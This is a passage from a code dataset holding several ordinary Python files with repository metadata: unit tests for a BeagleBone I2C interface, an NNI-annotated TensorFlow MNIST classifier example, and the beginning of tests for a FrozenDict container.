        " University of Ljubljana, Faculty of Civil and Geodetic Engineering (UL FGG), 2020\n"
        "<br>\n"
        "</body></html>"))
    self.button_report_bug.setText(_translate("RvtAbout", "Report a bug"))
    self.button_close.setText(_translate("RvtAbout", "Close"))
| 10,999 | 5 | 76 |
7cf6302011a542d687e42d92503a0c389d9e374c | 3,109 | py | Python | servo/interface/bbi2c_unittests.py | neverware-mirrors/hdctools | dd7f911bb9051e615af7fcb71d921bd481f934fb | [
"BSD-3-Clause"
] | null | null | null | servo/interface/bbi2c_unittests.py | neverware-mirrors/hdctools | dd7f911bb9051e615af7fcb71d921bd481f934fb | [
"BSD-3-Clause"
] | null | null | null | servo/interface/bbi2c_unittests.py | neverware-mirrors/hdctools | dd7f911bb9051e615af7fcb71d921bd481f934fb | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests usage of i2c interface for beaglebone devices."""
import mox
import unittest
import bbi2c
DEFAULT_BUS_NUM = 3
SLAVE_ADDRESS = 0x20
DATA_ADDRESS = 0x0
# Entry point: run the unittest test runner when executed directly.
# NOTE(review): this (filtered) copy of the file defines no TestCase
# classes, so the runner would find nothing to execute here.
if __name__ == '__main__':
    unittest.main()
| 31.40404 | 76 | 0.677388 | # Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests usage of i2c interface for beaglebone devices."""
import mox
import unittest
import bbi2c
DEFAULT_BUS_NUM = 3
SLAVE_ADDRESS = 0x20
DATA_ADDRESS = 0x0
class TestBBi2c(mox.MoxTestBase):
    """Unit tests for bbi2c.BBi2c using mox record/replay mocks.

    The helpers below *record* the exact subprocess calls (i2cget/i2cset)
    that BBi2c is expected to issue; ReplayAll() then verifies the calls
    happen in that order with those arguments. Because expectations are
    order-sensitive, statement order in this class must not be changed.
    """

    def setUp(self):
        """Replace bbi2c's subprocess and bbmux_controller with mox mocks."""
        super(TestBBi2c, self).setUp()
        bbi2c.subprocess = self.mox.CreateMockAnything()
        bbi2c.bbmux_controller = self.mox.CreateMockAnything()
        # BBi2c queries the mux style during construction.
        bbi2c.bbmux_controller.use_omapmux().AndReturn(True)

    def readTestHelper(self, data, send_address=True):
        """Record the i2cget invocation expected for reading ``data`` bytes.

        NOTE(review): the interface is built with bus_num 2 but the expected
        command line uses bus '3' -- presumably an off-by-one between the
        BBi2c bus numbering and the Linux i2c device number; confirm against
        bbi2c.py.
        """
        if send_address:
            # One-byte reads first write the data address, then read bare.
            self.singleWriteTestHelper([DATA_ADDRESS])
        args = ['i2cget', '-y', '3', '0x20']
        if len(data) == 2:
            # Word (two-byte) reads pass the data address and 'w' mode.
            args.append('0x%02x' % DATA_ADDRESS)
            args.append('w')
        # i2cget prints the value with the low byte first, so the expected
        # output is built from ``data`` reversed (e.g. [0x10, 0x01] -> '0x0110').
        result = '0x' + ''.join('%02x' % byte for byte in reversed(data))
        bbi2c.subprocess.check_output(args).AndReturn(result)

    def singleWriteTestHelper(self, data):
        """Record the i2cset invocation expected for writing ``data``.

        data[0] is the register/data address; data[1:] (0-2 bytes) is the
        payload, emitted low byte first, with 'w' mode for word writes.
        """
        args = ['i2cset', '-y', '3', '0x20', '0x%02x' % data[0]]
        if data[1:]:
            reversed_data = reversed(data[1:])
            args.append('0x' + ''.join('%02x' % wbyte for wbyte in reversed_data))
            if len(data[1:]) == 2:
                args.append('w')
        bbi2c.subprocess.check_call(args)

    def testSingleByteRead(self):
        """A 1-byte read issues an address write followed by a bare i2cget."""
        data = [0x10]
        self.readTestHelper(data)
        self.mox.ReplayAll()
        self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
        result = self.bbi2c.wr_rd(SLAVE_ADDRESS, [DATA_ADDRESS], len(data))
        self.assertEquals(result, data)

    def testMultiByteRead(self):
        """A 2-byte read uses i2cget word mode."""
        data = [0x10, 0x01]
        self.readTestHelper(data)
        self.mox.ReplayAll()
        self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
        result = self.bbi2c.wr_rd(SLAVE_ADDRESS, [DATA_ADDRESS], len(data))
        self.assertEquals(result, data)

    def testSingleByteWrite(self):
        """Writing one byte maps to i2cset with only the data address."""
        data = [0x7]
        self.singleWriteTestHelper(data)
        self.mox.ReplayAll()
        self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
        self.bbi2c.wr_rd(SLAVE_ADDRESS, data, 0)

    def testTwoByteWrite(self):
        """Writing address + one payload byte."""
        data = [0x7, 0x8]
        self.singleWriteTestHelper(data)
        self.mox.ReplayAll()
        self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
        self.bbi2c.wr_rd(SLAVE_ADDRESS, data, 0)

    def testThreeByteWrite(self):
        """Writing address + two payload bytes uses i2cset word mode."""
        data = [0x7, 0x8, 0x9]
        self.singleWriteTestHelper(data)
        self.mox.ReplayAll()
        self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
        self.bbi2c.wr_rd(SLAVE_ADDRESS, data, 0)

    def testBlockWriteFailure(self):
        """Writes larger than a word are unsupported and must raise."""
        data = [0x7, 0x8, 0x9, 0x10, 0x11, 0x12, 0x13]
        self.mox.ReplayAll()
        self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
        with self.assertRaises(bbi2c.BBi2cError):
            self.bbi2c.wr_rd(SLAVE_ADDRESS, data, 0)

    def testWriteAndRead(self):
        """A combined transaction: write payload, then read without re-addressing."""
        wr_data = [DATA_ADDRESS, 0x8, 0x9]
        rd_data = [0x10, 0x01]
        self.singleWriteTestHelper(wr_data)
        self.readTestHelper(rd_data, send_address=False)
        self.mox.ReplayAll()
        self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
        result = self.bbi2c.wr_rd(SLAVE_ADDRESS, wr_data, len(rd_data))
        self.assertEquals(result, rd_data)
# Entry point: discover and run the TestBBi2c cases above.
if __name__ == '__main__':
    unittest.main()
| 2,446 | 12 | 273 |
07db565e89e01b930eca278def9e68e73aa86ff3 | 10,919 | py | Python | tools/nni_annotation/examples/mnist_with_annotation.py | lawwu/nni | b869dd48dfe36392e7b78c70ea35eb6d4b4779dc | [
"MIT"
] | 2 | 2020-02-03T09:00:47.000Z | 2020-02-03T09:00:49.000Z | tools/nni_annotation/examples/mnist_with_annotation.py | leckie-chn/nni | 141f24d42d2e86ace3774d931bfab58dca0ef1ad | [
"MIT"
] | 16 | 2020-01-28T22:44:42.000Z | 2022-02-10T00:20:32.000Z | tools/nni_annotation/examples/mnist_with_annotation.py | leckie-chn/nni | 141f24d42d2e86ace3774d931bfab58dca0ef1ad | [
"MIT"
] | 1 | 2019-11-29T08:56:14.000Z | 2019-11-29T08:56:14.000Z | #!/usr/bin/python
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""A deep MNIST classifier using convolutional layers."""
import logging
import math
import tempfile
import time
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
FLAGS = None
logger = logging.getLogger('mnist_AutoML')
class MnistNetwork(object):
    '''
    MnistNetwork initializes and builds the basic convolutional network
    for MNIST (two conv+pool stages, one hidden FC layer, dropout, softmax).
    '''

    def __init__(self,
                 channel_1_num,
                 channel_2_num,
                 conv_size,
                 hidden_size,
                 pool_size,
                 learning_rate,
                 x_dim=784,
                 y_dim=10):
        """Store hyper-parameters and create the input placeholders.

        Restored: this copy of the file was missing __init__, so the
        keyword construction in main() raised TypeError and every self.*
        attribute read in build_network was undefined. The body matches
        the complete original of this file. The bare-string
        ``@nni.variable`` annotations are consumed by NNI's source
        rewriter and must stay directly above their target assignments.
        """
        self.channel_1_num = channel_1_num
        self.channel_2_num = channel_2_num
        """@nni.variable(nni.choice(2, 3, 5, 7),name=self.conv_size)"""
        self.conv_size = conv_size
        """@nni.variable(nni.choice(124, 512, 1024), name=self.hidden_size)"""
        self.hidden_size = hidden_size
        self.pool_size = pool_size
        """@nni.variable(nni.uniform(0.0001, 0.1), name=self.learning_rate)"""
        self.learning_rate = learning_rate
        self.x_dim = x_dim
        self.y_dim = y_dim
        self.images = tf.placeholder(tf.float32, [None, self.x_dim], name='input_x')
        self.labels = tf.placeholder(tf.float32, [None, self.y_dim], name='input_y')
        self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')
        # Populated by build_network().
        self.train_step = None
        self.accuracy = None

    def build_network(self):
        '''
        Build the TF graph for MNIST; sets self.train_step and self.accuracy.
        '''
        # Reshape to use within a convolutional neural net.
        # Last dimension is for "features" - there is only one here, since images are
        # grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
        with tf.name_scope('reshape'):
            try:
                input_dim = int(math.sqrt(self.x_dim))
            except:
                print(
                    'input dim cannot be sqrt and reshape. input dim: ' + str(self.x_dim))
                logger.debug(
                    'input dim cannot be sqrt and reshape. input dim: %s', str(self.x_dim))
                raise
            x_image = tf.reshape(self.images, [-1, input_dim, input_dim, 1])
        # First convolutional layer - maps one grayscale image to 32 feature maps.
        with tf.name_scope('conv1'):
            w_conv1 = weight_variable(
                [self.conv_size, self.conv_size, 1, self.channel_1_num])
            b_conv1 = bias_variable([self.channel_1_num])
            """@nni.function_choice(tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1), tf.nn.sigmoid(conv2d(x_image, w_conv1) + b_conv1), tf.nn.tanh(conv2d(x_image, w_conv1) + b_conv1), name=tf.nn.relu)"""
            h_conv1 = tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1)
        # Pooling layer - downsamples by 2X.
        with tf.name_scope('pool1'):
            """@nni.function_choice(max_pool(h_conv1, self.pool_size), avg_pool(h_conv1, self.pool_size), name=max_pool)"""
            h_pool1 = max_pool(h_conv1, self.pool_size)
        # Second convolutional layer -- maps 32 feature maps to 64.
        with tf.name_scope('conv2'):
            w_conv2 = weight_variable([self.conv_size, self.conv_size,
                                       self.channel_1_num, self.channel_2_num])
            b_conv2 = bias_variable([self.channel_2_num])
            h_conv2 = tf.nn.relu(conv2d(h_pool1, w_conv2) + b_conv2)
        # Second pooling layer.
        with tf.name_scope('pool2'):
            h_pool2 = max_pool(h_conv2, self.pool_size)
        # Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image
        # is down to 7x7x64 feature maps -- maps this to 1024 features.
        last_dim = int(input_dim / (self.pool_size * self.pool_size))
        with tf.name_scope('fc1'):
            w_fc1 = weight_variable(
                [last_dim * last_dim * self.channel_2_num, self.hidden_size])
            b_fc1 = bias_variable([self.hidden_size])
            h_pool2_flat = tf.reshape(
                h_pool2, [-1, last_dim * last_dim * self.channel_2_num])
            h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, w_fc1) + b_fc1)
        # Dropout - controls the complexity of the model, prevents co-adaptation of features.
        with tf.name_scope('dropout'):
            h_fc1_drop = tf.nn.dropout(h_fc1, self.keep_prob)
        # Map the 1024 features to 10 classes, one for each digit
        with tf.name_scope('fc2'):
            w_fc2 = weight_variable([self.hidden_size, self.y_dim])
            b_fc2 = bias_variable([self.y_dim])
            y_conv = tf.matmul(h_fc1_drop, w_fc2) + b_fc2
        with tf.name_scope('loss'):
            cross_entropy = tf.reduce_mean(
                tf.nn.softmax_cross_entropy_with_logits(labels=self.labels, logits=y_conv))
        with tf.name_scope('adam_optimizer'):
            self.train_step = tf.train.AdamOptimizer(
                self.learning_rate).minimize(cross_entropy)
        with tf.name_scope('accuracy'):
            correct_prediction = tf.equal(
                tf.argmax(y_conv, 1), tf.argmax(self.labels, 1))
            self.accuracy = tf.reduce_mean(
                tf.cast(correct_prediction, tf.float32))
def conv2d(x_input, w_matrix):
    """Return a 2-D convolution of x_input with w_matrix (stride 1, SAME padding)."""
    unit_strides = [1, 1, 1, 1]
    return tf.nn.conv2d(x_input, w_matrix, strides=unit_strides, padding='SAME')
def max_pool(x_input, pool_size):
    """max_pool downsamples a feature map by 2X."""
    return tf.nn.max_pool(x_input, ksize=[1, pool_size, pool_size, 1],
                          strides=[1, pool_size, pool_size, 1], padding='SAME')


def avg_pool(x_input, pool_size):
    """avg_pool downsamples a feature map using average pooling (SAME padding).

    Restored: referenced by the ``@nni.function_choice`` annotation in
    MnistNetwork.build_network but missing from this copy of the file;
    body matches the complete original later in the file.
    """
    return tf.nn.avg_pool(x_input, ksize=[1, pool_size, pool_size, 1],
                          strides=[1, pool_size, pool_size, 1], padding='SAME')
def weight_variable(shape):
    """Create a weight Variable of the given shape (truncated normal, stddev 0.1)."""
    return tf.Variable(tf.truncated_normal(shape, stddev=0.1))
def bias_variable(shape):
    """Create a bias Variable of the given shape, initialized to 0.1."""
    return tf.Variable(tf.constant(0.1, shape=shape))
def download_mnist_retry(data_dir, max_num_retries=20):
    """Download the MNIST dataset, retrying on AlreadyExistsError.

    Raises Exception after ``max_num_retries`` failed attempts.
    """
    attempts_left = max_num_retries
    while attempts_left > 0:
        attempts_left -= 1
        try:
            return input_data.read_data_sets(data_dir, one_hot=True)
        except tf.errors.AlreadyExistsError:
            # Another trial is mid-download; wait a second and retry.
            time.sleep(1)
    raise Exception("Failed to download MNIST.")
def main(params):
    '''
    Main function, build mnist network, run and send result to NNI.

    params: dict of hyper-parameters; see generate_defualt_params for keys.
    The bare-string @nni.* annotations below are rewritten by NNI's
    annotation parser and must stay directly above their target lines.
    '''
    # Import data
    mnist = download_mnist_retry(params['data_dir'])
    print('Mnist download data done.')
    logger.debug('Mnist download data done.')
    # Create the model
    # Build the graph for the deep net
    mnist_network = MnistNetwork(channel_1_num=params['channel_1_num'],
                                 channel_2_num=params['channel_2_num'],
                                 conv_size=params['conv_size'],
                                 hidden_size=params['hidden_size'],
                                 pool_size=params['pool_size'],
                                 learning_rate=params['learning_rate'])
    mnist_network.build_network()
    logger.debug('Mnist build network done.')
    # Write log
    graph_location = tempfile.mkdtemp()
    logger.debug('Saving graph to: %s', graph_location)
    train_writer = tf.summary.FileWriter(graph_location)
    train_writer.add_graph(tf.get_default_graph())
    test_acc = 0.0
    with tf.Session() as sess:
        # ``sess`` is not referenced directly; run()/eval() below use the
        # default session established by this context manager.
        sess.run(tf.global_variables_initializer())
        """@nni.variable(nni.choice(50, 250, 500), name=batch_num)"""
        batch_num = params['batch_num']
        # NOTE(review): batch_num is used both as the number of training
        # iterations and as the mini-batch size -- confirm this is intended.
        for i in range(batch_num):
            batch = mnist.train.next_batch(batch_num)
            """@nni.variable(nni.choice(1, 5), name=dropout_rate)"""
            dropout_rate = params['dropout_rate']
            mnist_network.train_step.run(feed_dict={mnist_network.images: batch[0],
                                                    mnist_network.labels: batch[1],
                                                    mnist_network.keep_prob: dropout_rate}
                                         )
            if i % 100 == 0:
                # Periodically report intermediate accuracy to NNI.
                test_acc = mnist_network.accuracy.eval(
                    feed_dict={mnist_network.images: mnist.test.images,
                               mnist_network.labels: mnist.test.labels,
                               mnist_network.keep_prob: 1.0})
                """@nni.report_intermediate_result(test_acc)"""
                logger.debug('test accuracy %g', test_acc)
                logger.debug('Pipe send intermediate result done.')
        # Final evaluation on the full test set (dropout disabled).
        test_acc = mnist_network.accuracy.eval(
            feed_dict={mnist_network.images: mnist.test.images,
                       mnist_network.labels: mnist.test.labels,
                       mnist_network.keep_prob: 1.0})
        """@nni.report_final_result(test_acc)"""
        logger.debug('Final result is %g', test_acc)
        logger.debug('Send final result done.')
def generate_defualt_params():
    """Return the default hyper-parameter dict for the MNIST network.

    (The misspelling of "default" in the name is kept for backward
    compatibility with existing callers.)
    """
    return {
        'data_dir': '/tmp/tensorflow/mnist/input_data',
        'dropout_rate': 0.5,
        'channel_1_num': 32,
        'channel_2_num': 64,
        'conv_size': 5,
        'pool_size': 2,
        'hidden_size': 1024,
        'learning_rate': 1e-4,
        'batch_num': 200,
    }
if __name__ == '__main__':
    """@nni.get_next_parameter()"""
    # The bare-string annotation above is rewritten by NNI to fetch the next
    # hyper-parameter set; keep it in place.
    try:
        main(generate_defualt_params())
    except Exception as exception:
        # Log the traceback, then re-raise so the trial exits non-zero.
        logger.exception(exception)
        raise
| 41.203774 | 202 | 0.62176 | #!/usr/bin/python
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""A deep MNIST classifier using convolutional layers."""
import logging
import math
import tempfile
import time
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
FLAGS = None
logger = logging.getLogger('mnist_AutoML')
class MnistNetwork(object):
    '''
    MnistNetwork initializes and builds the basic convolutional network
    for mnist (two conv+pool stages, one hidden FC layer, dropout, softmax).
    '''
    def __init__(self,
                 channel_1_num,
                 channel_2_num,
                 conv_size,
                 hidden_size,
                 pool_size,
                 learning_rate,
                 x_dim=784,
                 y_dim=10):
        """Store hyper-parameters and create the input placeholders.

        The bare-string ``@nni.variable`` annotations below are consumed by
        NNI's source rewriter and must stay directly above their target
        assignments.
        """
        self.channel_1_num = channel_1_num
        self.channel_2_num = channel_2_num
        """@nni.variable(nni.choice(2, 3, 5, 7),name=self.conv_size)"""
        self.conv_size = conv_size
        """@nni.variable(nni.choice(124, 512, 1024), name=self.hidden_size)"""
        self.hidden_size = hidden_size
        self.pool_size = pool_size
        """@nni.variable(nni.uniform(0.0001, 0.1), name=self.learning_rate)"""
        self.learning_rate = learning_rate
        self.x_dim = x_dim
        self.y_dim = y_dim
        self.images = tf.placeholder(tf.float32, [None, self.x_dim], name='input_x')
        self.labels = tf.placeholder(tf.float32, [None, self.y_dim], name='input_y')
        self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')
        # Populated by build_network().
        self.train_step = None
        self.accuracy = None
    def build_network(self):
        '''
        Building network for mnist; sets self.train_step and self.accuracy.
        '''
        # Reshape to use within a convolutional neural net.
        # Last dimension is for "features" - there is only one here, since images are
        # grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
        with tf.name_scope('reshape'):
            try:
                input_dim = int(math.sqrt(self.x_dim))
            except:
                print(
                    'input dim cannot be sqrt and reshape. input dim: ' + str(self.x_dim))
                logger.debug(
                    'input dim cannot be sqrt and reshape. input dim: %s', str(self.x_dim))
                raise
            x_image = tf.reshape(self.images, [-1, input_dim, input_dim, 1])
        # First convolutional layer - maps one grayscale image to 32 feature maps.
        with tf.name_scope('conv1'):
            w_conv1 = weight_variable(
                [self.conv_size, self.conv_size, 1, self.channel_1_num])
            b_conv1 = bias_variable([self.channel_1_num])
            """@nni.function_choice(tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1), tf.nn.sigmoid(conv2d(x_image, w_conv1) + b_conv1), tf.nn.tanh(conv2d(x_image, w_conv1) + b_conv1), name=tf.nn.relu)"""
            h_conv1 = tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1)
        # Pooling layer - downsamples by 2X.
        with tf.name_scope('pool1'):
            """@nni.function_choice(max_pool(h_conv1, self.pool_size), avg_pool(h_conv1, self.pool_size), name=max_pool)"""
            h_pool1 = max_pool(h_conv1, self.pool_size)
        # Second convolutional layer -- maps 32 feature maps to 64.
        with tf.name_scope('conv2'):
            w_conv2 = weight_variable([self.conv_size, self.conv_size,
                                       self.channel_1_num, self.channel_2_num])
            b_conv2 = bias_variable([self.channel_2_num])
            h_conv2 = tf.nn.relu(conv2d(h_pool1, w_conv2) + b_conv2)
        # Second pooling layer.
        with tf.name_scope('pool2'):
            h_pool2 = max_pool(h_conv2, self.pool_size)
        # Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image
        # is down to 7x7x64 feature maps -- maps this to 1024 features.
        last_dim = int(input_dim / (self.pool_size * self.pool_size))
        with tf.name_scope('fc1'):
            w_fc1 = weight_variable(
                [last_dim * last_dim * self.channel_2_num, self.hidden_size])
            b_fc1 = bias_variable([self.hidden_size])
            h_pool2_flat = tf.reshape(
                h_pool2, [-1, last_dim * last_dim * self.channel_2_num])
            h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, w_fc1) + b_fc1)
        # Dropout - controls the complexity of the model, prevents co-adaptation of features.
        with tf.name_scope('dropout'):
            h_fc1_drop = tf.nn.dropout(h_fc1, self.keep_prob)
        # Map the 1024 features to 10 classes, one for each digit
        with tf.name_scope('fc2'):
            w_fc2 = weight_variable([self.hidden_size, self.y_dim])
            b_fc2 = bias_variable([self.y_dim])
            y_conv = tf.matmul(h_fc1_drop, w_fc2) + b_fc2
        with tf.name_scope('loss'):
            cross_entropy = tf.reduce_mean(
                tf.nn.softmax_cross_entropy_with_logits(labels=self.labels, logits=y_conv))
        with tf.name_scope('adam_optimizer'):
            self.train_step = tf.train.AdamOptimizer(
                self.learning_rate).minimize(cross_entropy)
        with tf.name_scope('accuracy'):
            correct_prediction = tf.equal(
                tf.argmax(y_conv, 1), tf.argmax(self.labels, 1))
            self.accuracy = tf.reduce_mean(
                tf.cast(correct_prediction, tf.float32))
def conv2d(x_input, w_matrix):
    """Return a 2-D convolution of x_input with w_matrix (stride 1, SAME padding)."""
    unit_strides = [1, 1, 1, 1]
    return tf.nn.conv2d(x_input, w_matrix, strides=unit_strides, padding='SAME')
def max_pool(x_input, pool_size):
    """Downsample x_input by pool_size using max pooling (SAME padding)."""
    window = [1, pool_size, pool_size, 1]
    return tf.nn.max_pool(x_input, ksize=window, strides=window, padding='SAME')
def avg_pool(x_input, pool_size):
    """avg_pool downsamples a feature map by pool_size using average pooling."""
    # Alternative to max_pool, selectable via the @nni.function_choice
    # annotation in MnistNetwork.build_network.
    return tf.nn.avg_pool(x_input, ksize=[1, pool_size, pool_size, 1],
                          strides=[1, pool_size, pool_size, 1], padding='SAME')
def weight_variable(shape):
    """Create a weight Variable of the given shape (truncated normal, stddev 0.1)."""
    return tf.Variable(tf.truncated_normal(shape, stddev=0.1))
def bias_variable(shape):
    """Create a bias Variable of the given shape, initialized to 0.1."""
    return tf.Variable(tf.constant(0.1, shape=shape))
def download_mnist_retry(data_dir, max_num_retries=20):
    """Download the MNIST dataset, retrying on AlreadyExistsError.

    Raises Exception after ``max_num_retries`` failed attempts.
    """
    attempts_left = max_num_retries
    while attempts_left > 0:
        attempts_left -= 1
        try:
            return input_data.read_data_sets(data_dir, one_hot=True)
        except tf.errors.AlreadyExistsError:
            # Another trial is mid-download; wait a second and retry.
            time.sleep(1)
    raise Exception("Failed to download MNIST.")
def main(params):
    '''
    Main function, build mnist network, run and send result to NNI.

    params: dict of hyper-parameters; see generate_defualt_params for keys.
    The bare-string @nni.* annotations below are rewritten by NNI's
    annotation parser and must stay directly above their target lines.
    '''
    # Import data
    mnist = download_mnist_retry(params['data_dir'])
    print('Mnist download data done.')
    logger.debug('Mnist download data done.')
    # Create the model
    # Build the graph for the deep net
    mnist_network = MnistNetwork(channel_1_num=params['channel_1_num'],
                                 channel_2_num=params['channel_2_num'],
                                 conv_size=params['conv_size'],
                                 hidden_size=params['hidden_size'],
                                 pool_size=params['pool_size'],
                                 learning_rate=params['learning_rate'])
    mnist_network.build_network()
    logger.debug('Mnist build network done.')
    # Write log
    graph_location = tempfile.mkdtemp()
    logger.debug('Saving graph to: %s', graph_location)
    train_writer = tf.summary.FileWriter(graph_location)
    train_writer.add_graph(tf.get_default_graph())
    test_acc = 0.0
    with tf.Session() as sess:
        # ``sess`` is not referenced directly; run()/eval() below use the
        # default session established by this context manager.
        sess.run(tf.global_variables_initializer())
        """@nni.variable(nni.choice(50, 250, 500), name=batch_num)"""
        batch_num = params['batch_num']
        # NOTE(review): batch_num is used both as the number of training
        # iterations and as the mini-batch size -- confirm this is intended.
        for i in range(batch_num):
            batch = mnist.train.next_batch(batch_num)
            """@nni.variable(nni.choice(1, 5), name=dropout_rate)"""
            dropout_rate = params['dropout_rate']
            mnist_network.train_step.run(feed_dict={mnist_network.images: batch[0],
                                                    mnist_network.labels: batch[1],
                                                    mnist_network.keep_prob: dropout_rate}
                                         )
            if i % 100 == 0:
                # Periodically report intermediate accuracy to NNI.
                test_acc = mnist_network.accuracy.eval(
                    feed_dict={mnist_network.images: mnist.test.images,
                               mnist_network.labels: mnist.test.labels,
                               mnist_network.keep_prob: 1.0})
                """@nni.report_intermediate_result(test_acc)"""
                logger.debug('test accuracy %g', test_acc)
                logger.debug('Pipe send intermediate result done.')
        # Final evaluation on the full test set (dropout disabled).
        test_acc = mnist_network.accuracy.eval(
            feed_dict={mnist_network.images: mnist.test.images,
                       mnist_network.labels: mnist.test.labels,
                       mnist_network.keep_prob: 1.0})
        """@nni.report_final_result(test_acc)"""
        logger.debug('Final result is %g', test_acc)
        logger.debug('Send final result done.')
def generate_defualt_params():
    """Return the default hyper-parameter dict for the MNIST network.

    (The misspelling of "default" in the name is kept for backward
    compatibility with existing callers.)
    """
    return {
        'data_dir': '/tmp/tensorflow/mnist/input_data',
        'dropout_rate': 0.5,
        'channel_1_num': 32,
        'channel_2_num': 64,
        'conv_size': 5,
        'pool_size': 2,
        'hidden_size': 1024,
        'learning_rate': 1e-4,
        'batch_num': 200,
    }
if __name__ == '__main__':
    """@nni.get_next_parameter()"""
    # The bare-string annotation above is rewritten by NNI to fetch the next
    # hyper-parameter set; keep it in place.
    try:
        main(generate_defualt_params())
    except Exception as exception:
        # Log the traceback, then re-raise so the trial exits non-zero.
        logger.exception(exception)
        raise
| 1,222 | 0 | 49 |
593b6dff1470a200eb27d91c864a91ea81f247b7 | 14,847 | py | Python | dicttools/tests/test_containers.py | trzemecki/dicttools | 24f040d5c3ab91fc6eeb72cf8a392f7a34026989 | [
"Apache-2.0"
] | 2 | 2016-06-03T16:04:27.000Z | 2018-02-14T14:50:35.000Z | dicttools/tests/test_containers.py | trzemecki/dicttools | 24f040d5c3ab91fc6eeb72cf8a392f7a34026989 | [
"Apache-2.0"
] | 3 | 2018-03-05T16:55:26.000Z | 2020-10-22T16:43:08.000Z | dicttools/tests/test_containers.py | trzemecki/dicttools | 24f040d5c3ab91fc6eeb72cf8a392f7a34026989 | [
"Apache-2.0"
] | 2 | 2018-02-14T14:50:41.000Z | 2020-10-21T13:48:20.000Z | from __future__ import absolute_import
import unittest
import six
import dicttools
| 28.998047 | 97 | 0.592308 | from __future__ import absolute_import
import unittest
import six
import dicttools
class FrozenDictTests(unittest.TestCase):
    """Behavioral tests for dicttools.FrozenDict.

    Naming convention: test_<Member>_<Condition>_<ExpectedOutcome>.
    Covers construction (mapping / pair-iterable / kwargs), read-only dict
    protocol (getitem, get, contains, keys/values/items, iteration),
    equality/hashing, str(), and dict interop.
    """

    def test_Init_CreateEmptyFrozenDict_LengthIs0(self):
        instance = self.create()
        self.assertEqual(0, len(instance))

    def test_Init_CreateFromMapping_LengthIsEqualToMappingLength(self):
        instance = self.create({'a': 1, 'b': 2})
        self.assertEqual(2, len(instance))

    def test_Init_CreateFromMapping_SaveContentFromMapping(self):
        instance = self.create({'a': 1, 'b': 2})
        self.assertEqual(1, instance['a'])

    def test_Init_CreateFromList_SaveContentFromIterablePairKeyValue(self):
        instance = self.create([('pi', 3.14), ('e', 2.72)])
        self.assertEqual(3.14, instance['pi'])

    def test_Init_CreateFromList_LengthIsEqualToMappingLength(self):
        instance = self.create([('pi', 3.14), ('e', 2.72)])
        self.assertEqual(2, len(instance))

    def test_Init_CreateFromKwargs_SaveContentFromGivenAssignments(self):
        instance = self.create(pi=3.14, e=2.72)
        self.assertEqual(2.72, instance['e'])

    def test_Init_CreateFromKwargsAndFromMapping_SaveContentFromGivenAssignmentsAndMapping(self):
        instance = self.create({'pi': 3.14}, e=2.72)
        self.assertEqual(2.72, instance['e'])

    def test_Init_KeyInKwargsAndFromMappingIsRepeated_SaveValueFormKwargs(self):
        # Keyword arguments win over the positional mapping, like dict().
        instance = self.create({'e': 3.14}, e=2.72)
        self.assertEqual(2.72, instance['e'])

    def test_Init_IterableValuesAreNotPairs_Throws(self):
        with self.assertRaisesRegexp(TypeError, "'int' object is not iterable"):
            self.create([1, 2, 3])

    def test_GetItem_NotExists_Throws(self):
